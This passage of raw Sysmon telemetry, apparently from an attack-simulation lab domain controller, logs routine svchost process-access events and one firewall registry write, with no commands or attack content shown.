13:29:58.014{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010205Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.014{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010204Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.014{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010203Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.014{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010202Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.014{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010201Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.014{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010200Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.014{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010199Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.014{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010198Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.014{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010197Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.014{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010196Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010195Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010194Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010193Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010192Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010191Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010190Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010189Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.998{08A6967A-4288-6000-1000-000000009A01}11361504C:\Windows\system32\svchost.exe{08A6967A-4755-6000-1B05-000000009A01}3580C:\Windows\system32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010188Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.998{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-4755-6000-1B05-000000009A01}3580C:\Windows\system32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010187Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010186Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010185Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010184Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010183Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010182Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:57.998{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-19479607-1015771884-3827151630-3301822711-2267158487-4079414233-1230461222S-1-5-21-2738482597-1131698221-3520544381-500v2.26|AppPkgId=S-1-15-2-19479607-1015771884-3827151630-3301822711-2267158487-4079414233-1230461222|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|C=S-1-15-3-3845273463-1331427702-1186551195-1148109977|C=S-1-15-3-787448254-1207972858-3558633622-1059886964|C=S-1-15-3-19479607-1015771884-3827151630-3301822711-2267158487-4079414233-1230461222|M=microsoft.bioenrollment_cw5n1h2txyewy|Name=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|Desc=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|D=C:\Windows\SystemApps\Microsoft.BioEnrollment_cw5n1h2txyewy\|PFN=Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy| 10341000x800000000000000010181Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 